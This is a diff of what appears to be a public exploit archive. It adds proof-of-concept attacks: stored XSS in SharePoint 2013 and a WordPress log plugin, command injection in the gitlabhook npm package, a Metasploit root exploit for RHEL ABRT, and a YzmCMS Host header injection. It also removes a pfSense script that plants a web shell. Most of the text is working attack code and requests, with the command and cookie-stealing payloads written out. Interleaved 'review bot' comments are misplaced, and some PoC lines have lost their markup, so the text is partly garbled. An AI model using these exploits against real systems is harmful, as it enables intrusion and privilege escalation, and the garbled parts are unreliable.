diff --git a/exploits/aspx/webapps/47417.txt b/exploits/aspx/webapps/47417.txt
new file mode 100644
index 000000000..e7a6b7547
--- /dev/null
+++ b/exploits/aspx/webapps/47417.txt
@@ -0,0 +1,177 @@
+# Exploit Title: Microsoft SharePoint 2013 SP1 - 'DestinationFolder' Persistent Cross-Site Scripting
+# Author: Davide Cioccia
+# Discovery Date: 2019-09-25
+# Vendor Homepage: https://www.microsoft.com
+# Software Link: https://support.microsoft.com/en-us/help/2880552/description-of-microsoft-sharepoint-server-2013-service-pack-1-sp1
+# Tested Version: SP1
+# Tested on: Microsoft Windows Server 2016
+# CVE: CVE-2019-1262
+# Advisory ID: ZSL-2019-5533
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5533.php
+# MSRC: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1262
+
+Vendor: Microsoft Corporation
+Product web page: https://www.microsoft.com
+Affected version: 2013 SP1
+
+Summary: SharePoint is a web-based collaborative platform that
+integrates with Microsoft Office. Launched in 2001, SharePoint
+is primarily sold as a document management and storage system,
+but the product is highly configurable and usage varies substantially
+among organizations.
+
+Desc: A cross-site-scripting (XSS) vulnerability exists when Microsoft
+SharePoint Server does not properly sanitize a specially crafted web
+request to an affected SharePoint server. An authenticated attacker
+could exploit the vulnerability by sending a specially crafted request
+to an affected SharePoint server. The attacker who successfully exploited
+the vulnerability could then perform cross-site scripting attacks on
+affected systems and run script in the security context of the current
+user. The attacks could allow the attacker to read content that the
+attacker is not authorized to read, use the victim's identity to take
+actions on the SharePoint site on behalf of the user, such as change
+permissions and delete content, and inject malicious content in the
+browser of the user.
+
+Sharepoint 2013 SP1 allows users to upload files to the platform, but
+does not correctly sanitize the filename when the files are listed. An
+authenticated user that has the rights to upload files to the SharePoint
+platform, is able to exploit a Stored Cross-Site Scripting vulnerability
+in the filename. The filename is reflected in the attribute 'aria-label'
+of the following HTML tag.
+
+# PoC request:
+
+
+POST /FOLDER/_layouts/15/Upload.aspx?List={689D112C-BDAA-4B05-B0CB-0DFB36CF0649}&RootFolder=&IsDlg=1 HTTP/1.1
+Host: vulnerable_sharepoint_2013
+Connection: close
+Content-Length: 31337
+Cache-Control: max-age=0
+Authorization: Negotiate YIIV9gYGKwYBBQUCo........................JBAq39IdJh3yphI1uHbz/jbQ==
+Origin: https://vulnerable_sharepoint_2013.tld
+Upgrade-Insecure-Requests: 1
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryewNI1MC6qaHDB50n
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
+Sec-Fetch-Mode: nested-navigate
+Sec-Fetch-User: ?1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
+Sec-Fetch-Site: same-origin
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9,it-IT;q=0.8,it;q=0.7,nl;q=0.6
+Cookie: ...
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOWebPartPage_PostbackSource"
+
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOTlPn_SelectedWpId"
+
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOTlPn_View"
+
+0
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOTlPn_ShowSettings"
+
+False
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOGallery_SelectedLibrary"
+
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOGallery_FilterString"
+
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOTlPn_Button"
+
+none
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="__EVENTTARGET"
+
+ctl00$PlaceHolderMain$ctl00$RptControls$btnOK
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="__EVENTARGUMENT"
+
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOSPWebPartManager_DisplayModeName"
+
+Browse
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOSPWebPartManager_ExitingDesignMode"
+
+false
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOWebPartPage_Shared"
+
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOLayout_LayoutChanges"
+
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOLayout_InDesignMode"
+
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOSPWebPartManager_OldDisplayModeName"
+
+Browse
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOSPWebPartManager_StartWebPartEditingName"
+
+false
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="MSOSPWebPartManager_EndWebPartEditing"
+
+false
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="_maintainWorkspaceScrollPosition"
+
+0
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="__REQUESTDIGEST"
+
+[DIGEST]
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="__VIEWSTATE"
+
+[VIEWSTATE]
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="__VIEWSTATEGENERATOR"
+
+E6912F23
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="__SCROLLPOSITIONX"
+
+0
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="__SCROLLPOSITIONY"
+
+0
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="__EVENTVALIDATION"
+
+
+
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="destination"
+
+[DESTINATION_FOLDER]
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="ctl00$PlaceHolderMain$ctl01$ctl04$InputFile"; filename="' onmouseover=alert(document.cookie) '.jpg"
+Content-Type: image/jpeg
+
+
+ZSL
+------WebKitFormBoundaryewNI1MC6qaHDB50n
+Content-Disposition: form-data; name="ctl00$PlaceHolderMain$ctl01$ctl04$OverwriteSingle"
+
+on
+------WebKitFormBoundaryewNI1MC6qaHDB50n--
\ No newline at end of file
diff --git a/exploits/json/webapps/47420.txt b/exploits/json/webapps/47420.txt
new file mode 100644
index 000000000..19dd79474
--- /dev/null
+++ b/exploits/json/webapps/47420.txt
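Review bot: The sentence `The filename is reflected in the attribute 'aria-label' of the following HTML tag.` is not followed by any tag in the file, so the sink the advisory describes cannot be checked against the text; either restore the HTML element whose aria-label carries the filename or reword the sentence to name that element. The header block lists the MSRC advisory but no remediation line; a line such as `# Fix: apply the security update referenced in the MSRC advisory for CVE-2019-1262` would tell readers what to patch. The filename in the `InputFile` part is the stored value that is later rendered unescaped, which is worth saying explicitly next to the request rather than leaving the reader to infer it from the header fields.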
@@ -0,0 +1,18 @@
+# Exploit Title: NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution
+# Date: 2019-09-13
+# Exploit Author: Semen Alexandrovich Lyhin
+# Vendor Homepage: https://www.npmjs.com/package/gitlabhook
+# Version: 0.0.17
+# Tested on: Kali Linux 2, Windows 10.
+# CVE : CVE-2019-5485
+
+#!/usr/bin/python
+
+import requests
+
+target = "http://TARGET:3420"
+cmd = r"touch /tmp/poc.txt"
+json = '{"repository":{"name": "Diasporrra\'; %s;\'"}}'% cmd
+r = requests.post(target, json)
+
+print "Done."
\ No newline at end of file
diff --git a/exploits/linux/local/47421.rb b/exploits/linux/local/47421.rb
new file mode 100755
index 000000000..a4aabd75e
--- /dev/null
+++ b/exploits/linux/local/47421.rb
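Review bot: The local `json = '{...}' % cmd` shadows the name of the standard `json` module and is then handed to `requests.post(target, json)` positionally, where the second positional parameter is `data`, not `json=`; the string is therefore sent as a raw body, which reads as an accident even if it is intended. Renaming it and naming the keyword, `payload = '{"repository":{"name": "Diasporrra\'; %s;\'"}}' % cmd` and `r = requests.post(target, data=payload)`, makes the intent explicit without changing what is sent. The file also pairs a `#!/usr/bin/python` shebang with the Python 2 statement `print "Done."` under a `.txt` name; `print("Done.")` is valid on both interpreters. The header could also state the shell-interpolation sink in gitlabhook (the `repository.name` field reaching a shell command) so that defenders know what to look for in request logs.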
@@ -0,0 +1,160 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
+ include Msf::Post::File
+ include Msf::Post::Linux::Priv
+ include Msf::Post::Linux::System
+ include Msf::Post::Linux::Kernel
+ include Msf::Exploit::EXE
+ include Msf::Exploit::FileDropper
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'ABRT sosreport Privilege Escalation',
+ 'Description' => %q{
+ This module attempts to gain root privileges on RHEL systems with
+ a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured
+ as the crash handler.
+
+ `sosreport` uses an insecure temporary directory, allowing local users
+ to write to arbitrary files (CVE-2015-5287). This module uses a symlink
+ attack on `/var/tmp/abrt/cc-*$pid/` to overwrite the `modprobe` path
+ in `/proc/sys/kernel/modprobe`, resulting in root privileges.
+
+ Waiting for `sosreport` could take a few minutes.
+
+ This module has been tested successfully on:
+
+ abrt 2.1.11-12.el7 on RHEL 7.0 x86_64; and
+ abrt 2.1.11-19.el7 on RHEL 7.1 x86_64.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'rebel', # Discovery and sosreport-rhel7.py exploit
+ 'bcoles' # Metasploit
+ ],
+ 'DisclosureDate' => '2015-11-23',
+ 'Platform' => ['linux'],
+ 'Arch' =>
+ [
+ ARCH_X86,
+ ARCH_X64,
+ ARCH_ARMLE,
+ ARCH_AARCH64,
+ ARCH_PPC,
+ ARCH_MIPSLE,
+ ARCH_MIPSBE
+ ],
+ 'SessionTypes' => ['shell', 'meterpreter'],
+ 'Targets' => [[ 'Auto', {} ]],
+ 'References' =>
+ [
+ ['BID', '78137'],
+ ['CVE', '2015-5287'],
+ ['EDB', '38832'],
+ ['URL', 'https://www.openwall.com/lists/oss-security/2015/12/01/1'],
+ ['URL', 'https://access.redhat.com/errata/RHSA-2015:2505'],
+ ['URL', 'https://access.redhat.com/security/cve/CVE-2015-5287'],
+ ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1266837']
+ ]
+ ))
+ register_options [
+ OptInt.new('TIMEOUT', [true, 'Timeout for sosreport (seconds)', '600'])
+ ]
+ register_advanced_options [
+ OptBool.new('ForceExploit', [false, 'Override check result', false]),
+ OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+ ]
+ end
+
+ def base_dir
+ datastore['WritableDir']
+ end
+
+ def timeout
+ datastore['TIMEOUT']
+ end
+
+ def check
+ kernel_core_pattern = cmd_exec 'grep abrt-hook-ccpp /proc/sys/kernel/core_pattern'
+ unless kernel_core_pattern.include? 'abrt-hook-ccpp'
+ vprint_error 'System is not configured to use ABRT for crash reporting'
+ return CheckCode::Safe
+ end
+ vprint_good 'System is configured to use ABRT for crash reporting'
+
+ if cmd_exec('systemctl status abrt-ccpp | grep Active').include? 'inactive'
+ vprint_error 'abrt-ccp service not running'
+ return CheckCode::Safe
+ end
+ vprint_good 'abrt-ccpp service is running'
+
+ # Patched in 2.1.11-35.el7
+ pkg_info = cmd_exec('yum list installed abrt | grep abrt').to_s
+ abrt_version = pkg_info[/^abrt.*$/].to_s.split(/\s+/)[1]
+ if abrt_version.blank?
+ vprint_status 'Could not retrieve ABRT package version'
+ return CheckCode::Safe
+ end
+ unless Gem::Version.new(abrt_version) < Gem::Version.new('2.1.11-35.el7')
+ vprint_status "ABRT package version #{abrt_version} is not vulnerable"
+ return CheckCode::Safe
+ end
+ vprint_good "ABRT package version #{abrt_version} is vulnerable"
+
+ unless command_exists? 'python'
+ vprint_error 'python is not installed'
+ return CheckCode::Safe
+ end
+ vprint_good 'python is installed'
+
+ CheckCode::Appears
+ end
+
+ def upload_and_chmodx(path, data)
+ print_status "Writing '#{path}' (#{data.size} bytes) ..."
+ rm_f path
+ write_file path, data
+ chmod path
+ register_file_for_cleanup path
+ end
+
+ def exploit
+ unless check == CheckCode::Appears
+ unless datastore['ForceExploit']
+ fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+ end
+ print_warning 'Target does not appear to be vulnerable'
+ end
+
+ if is_root?
+ unless datastore['ForceExploit']
+ fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
+ end
+ end
+
+ unless writable? base_dir
+ fail_with Failure::BadConfig, "#{base_dir} is not writable"
+ end
+
+ exe_data = ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2015-5287', 'sosreport-rhel7.py')
+ exe_name = ".#{rand_text_alphanumeric 5..10}"
+ exe_path = "#{base_dir}/#{exe_name}"
+ upload_and_chmodx exe_path, exe_data
+
+ payload_path = "#{base_dir}/.#{rand_text_alphanumeric 5..10}"
+ upload_and_chmodx payload_path, generate_payload_exe
+
+ register_file_for_cleanup '/tmp/hax.sh'
+
+ print_status "Launching exploit - This might take a few minutes (Timeout: #{timeout}s) ..."
+ output = cmd_exec "echo \"#{payload_path}& exit\" | #{exe_path}", nil, timeout
+ output.each_line { |line| vprint_status line.chomp }
+ end
+end
\ No newline at end of file
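Review bot: `Gem::Version.new(abrt_version)` in `check` raises ArgumentError for any string outside RubyGems' version pattern, and as far as I can tell that pattern does not admit an underscore, which RHEL z-stream release tags carry (constructed form `2.1.11-NN.el7_N`), so on such a host the check aborts with an exception instead of returning a CheckCode; wrapping the comparison in `begin … rescue ArgumentError` and returning `CheckCode::Unknown` after a `vprint_status` of the raw string would keep it usable, and the patched state could then be treated as not vulnerable on a later, explicit comparison. RubyGems also rewrites the hyphen as a prerelease separator, so `'2.1.11-35.el7'` compares as `2.1.11.pre.35.el7`; that happens to order the release numbers correctly here but deserves a note beside `# Patched in 2.1.11-35.el7` so nobody later "fixes" it. `OptInt.new('TIMEOUT', [true, 'Timeout for sosreport (seconds)', '600'])` passes its default as a string while the neighbouring options use native types; `600` is consistent. `register_file_for_cleanup '/tmp/hax.sh'` is a fixed path that presumably mirrors something inside `sosreport-rhel7.py` (not in this diff) and ignores `WritableDir`, so a comment naming where that path originates would help the next maintainer.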
diff --git a/exploits/php/webapps/47413.py b/exploits/php/webapps/47413.py
deleted file mode 100755
index 355481786..000000000
--- a/exploits/php/webapps/47413.py
+++ /dev/null
@@ -1,167 +0,0 @@ -# Exploit Title: Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection -# Date: 23/09/2018 -# Author: Nassim Asrir -# Vendor Homepage: https://www.pfsense.org/ -# Contact: wassline@gmail.com | https://www.linkedin.com/in/nassim-asrir-b73a57122/ -# CVE: CVE-2019-16701 -# Tested On: Windows 10(64bit) | Pfsense 2.3.4 / 2.4.4-p3 -###################################################################################################### - -1 : About Pfsense: -================== - -pfSense is a free and open source firewall and router that also features unified threat management, load balancing, multi WAN, and more. - -2 : Technical Analysis: -======================= - -The pfsense allow users (uid=0) to make remote procedure calls over HTTP (XMLRPC) and the XMLRPC contain some critical methods which allow any authenticated user/hacker to execute OS commands. - -XMLRPC methods: - -pfsense.exec_shell -pfsense.exec_php -pfsense.filter_configure -pfsense.interfaces_carp_configure -pfsense.backup_config_section -pfsense.restore_config_section -pfsense.merge_config_section -pfsense.merge_installedpackages_section_xmlrpc -pfsense.host_firmware_version -pfsense.reboot -pfsense.get_notices -system.listMethods -system.methodHelp -system.methodSignature - -As we see in the output we have two interesting methods: pfsense.exec_shell and pfsense.exec_php. - -2 : Static Analysis: -==================== - -In the static analysis we will analysis the xmlrpc.php file. - -Line (73 - 82) - -This code check if the user have enough privileges. - -$user_entry = getUserEntry($username); - /* - * admin (uid = 0) is allowed - * or regular user with necessary privilege - */ - if (isset($user_entry['uid']) && $user_entry['uid'] != '0' && - !userHasPrivilege($user_entry, 'system-xmlrpc-ha-sync')) { - log_auth("webConfigurator authentication error for '" . - $username . "' from " . $this->remote_addr . 
- " not enough privileges"); - - -Line (137 - 146) - -This part of code is the interest for us. - -As we can see, first we have a check for auth then we have the dangerous function (eval) which take as parametere ($code). - - public function exec_php($code) { - $this->auth(); - - eval($code); - if ($toreturn) { - return $toreturn; - } - - return true; - } - -Line (155 - 160) - -In this part of code also we have a check for auth then the execution for ($code) - - public function exec_shell($code) { - $this->auth(); - - mwexec($code); - return true; - } - -3 - Exploit: -============ - -#!/usr/bin/env python - -import argparse -import requests -import urllib2 -import time -import sys -import string -import random - -parser = argparse.ArgumentParser() -parser.add_argument("--rhost", help = "Target Uri https://127.0.0.1") -parser.add_argument("--password", help = "pfsense Password") -args = parser.parse_args() - -rhost = args.rhost -password = args.password -print "" - -print "[+] CVE-2019-16701 - Pfsense - Remote Code Injection" -print "" -print "[+] Author: Nassim Asrir" -print "" - -command = "" -command += "" -command += "pfsense.host_firmware_version" -command += "" -command += ""+password+"" -command += "" -command += "" - -stage1 = rhost + "/xmlrpc.php" - -page = urllib2.urlopen(stage1, data=command).read() - -print "[+] Checking Login Creds" - - -if "Authentication failed" in page: - - print "[-] Wrong password :(" - sys.exit(0) -else: - - random = ''.join([random.choice(string.ascii_letters + string.digits) for n in xrange(32)]) - - print "[+] logged in successfully :)" - print "[+] Generating random file "+random+".php" - print "[+] Sending the exploit ....." - - - command = "" - command += "" - command += "pfsense.exec_php" - command += "" - command += ""+password+"" - command += "exec('echo \\'
  
\\' > /usr/local/www/"+random+".php');
" - command += "
" - command += "
" - -stage1 = rhost + "/xmlrpc.php" - -page = urllib2.urlopen(stage1, data=command).read() - -final = rhost+"/"+str(random)+".php" - -check = urllib2.urlopen(final) - -print "[+] Checking ....." - -if check.getcode() == 200: - - print "[+] Yeah! You got your shell: " + final+"?cmd=id" -else: - - print "[+] Sorry :( Shell not found check the path" \ No newline at end of file diff --git a/exploits/php/webapps/47419.txt b/exploits/php/webapps/47419.txt new file mode 100644 index 000000000..900a69721 --- /dev/null +++ b/exploits/php/webapps/47419.txt 
@@ -0,0 +1,41 @@
+# Exploit Title: WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting
+# Date: 2019-09-10
+# Exploit Author: strider
+# Software Link: https://github.com/anttiviljami/wp-server-log-viewer
+# Version: 1.0
+# Tested on: Debian 10 Buster x64 / Kali Linux
+# CVE : None
+
+====================================[Description]====================================
+This plugin allows you to add logfiles via wp-admin. The problem here is that the file paths are stored unfiltered/unescaped. This gives the possibility of a persistent XSS attack.
+
+
+====================================[Codepart]====================================
+
+if( isset( $_GET['action'] ) && 'new' === $_GET['action'] && isset( $_GET['logpath'] ) ) {
+ // new log was added
+ $logs = get_option( 'server_logs' );
+ if( is_null( $logs ) ) {
+ $logs = [];
+ }
+
+ $log = trim( $_GET['logpath'] ); //only trimmed string no escaping
+ $logs[] = $log; //here the log will be added without security checks
+ $logs = array_values( $logs );
+
+ $index = array_search( $log, $logs );
+
+ update_option( 'server_logs', $logs );
+
+ wp_safe_redirect( admin_url('tools.php?page=wp-server-log-viewer&log=' . $index) );
+ }
+
+
+
+====================================[Proof of Concept]====================================
+Add new log file to the plugin.
+paste this exploit into the form and submit it.
+
+log.txt
+
+It tries to render an image and triggers the onerror event and prints the cookie. in the tab you see the log.txt
\ No newline at end of file
diff --git a/exploits/php/webapps/47422.txt b/exploits/php/webapps/47422.txt
new file mode 100644
index 000000000..f4f2361b4
--- /dev/null
+++ b/exploits/php/webapps/47422.txt
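Review bot: The proof-of-concept line reads only `log.txt`, while the sentence after it says the input `tries to render an image and triggers the onerror event`, so the element the description refers to is absent from the line and the PoC section does not match its own text; the entry should either carry the element it describes or describe it in words so a reader can tell what was submitted. The code excerpt correctly pins the sink at `$log = trim( $_GET['logpath'] );` being stored and later echoed, but the advisory has no remediation line; a sentence such as `Fix: validate the path on input (sanitize_text_field / file_exists) and escape it on output with esc_html() or esc_attr()` would make it actionable for site owners. It is also worth stating that the handler reads `$_GET['logpath']` on a state-changing request, which is the detail a defender would look for in access logs.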
@@ -0,0 +1,83 @@ +# Exploit Title: YzmCMS 5.3 - 'Host' Header Injection +# Exploit Author: Debashis Pal +# Vendor Homepage: http://www.yzmcms.com/ +# Source: https://github.com/yzmcms/yzmcms +# Version: YzmCMS V5.3 +# CVE : N/A +# Tested on: Windows 7 SP1(64bit),XAMPP: 7.3.9 + +#About YzmCMS +============== +YzmCMS is a lightweight open source content management system that uses OOP (Object Oriented) to develop its own framework. + +#Vulnerability +=============== +Host Header Injection. + + +#PoC +===== +#YzmCMS V5.3 Access Path: TARGET/yzmcms/ + +curl http://TARGET/yzmcms/ -H "Host: www.google.com" + +//sample output start + + + + + + YzmCMS - 演示站 + + + + + + + + + + + + +
+
+ +欢迎光临本站! +
+
+ +
+